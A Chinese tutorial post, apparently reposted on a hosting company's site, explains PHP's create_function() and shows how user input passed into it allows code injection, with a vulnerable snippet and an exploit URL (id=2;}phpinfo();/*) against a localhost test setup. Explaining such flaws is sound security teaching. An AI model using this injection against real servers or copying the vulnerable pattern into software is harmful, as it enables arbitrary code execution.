PHPcreate_function()代码注入-创新互联

第一部分:介绍php函数 create_function():

创新互联建站主营梅州网站建设的网络公司,主营网站建设方案,成都app开发,梅州h5小程序制作搭建,梅州网站营销推广欢迎梅州等地区企业咨询

string create_function   ( string $args  , string $code  )

string $args变量部分

string $code 方法代码部分

举例:

create_function('$fname','echo $fname."Zhang"')

类似于:

function fT($fname) {   echo $fname."Zhang"; }

举一个官方提供的例子:

第二部分:如何利用create_function()代码注入

测试环境版本:

apache +php 5.2、apache +php 5.3

有问题的代码:

"; echo "=============================="; echo "
"; $f1 = create_function('$a',$str2); echo "
"; echo "=============================="; ?>

利用方法:

http://localhost/libtest/02-8.php?id=2;}phpinfo();/*

实现原理:

由于id=2;}phpinfo();/*

执行函数为:

源代码: function fT($a) {   echo "test".$a; } 注入后代码: function fT($a) {   echo "test";}   phpinfo();/*;//此处为注入代码。 }

测试效果:

PHP create_function()代码注入

另外有需要云服务器可以了解下创新互联cdcxhl.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


分享题目:PHPcreate_function()代码注入-创新互联
转载源于:http://pwwzsj.com/article/cddeoi.html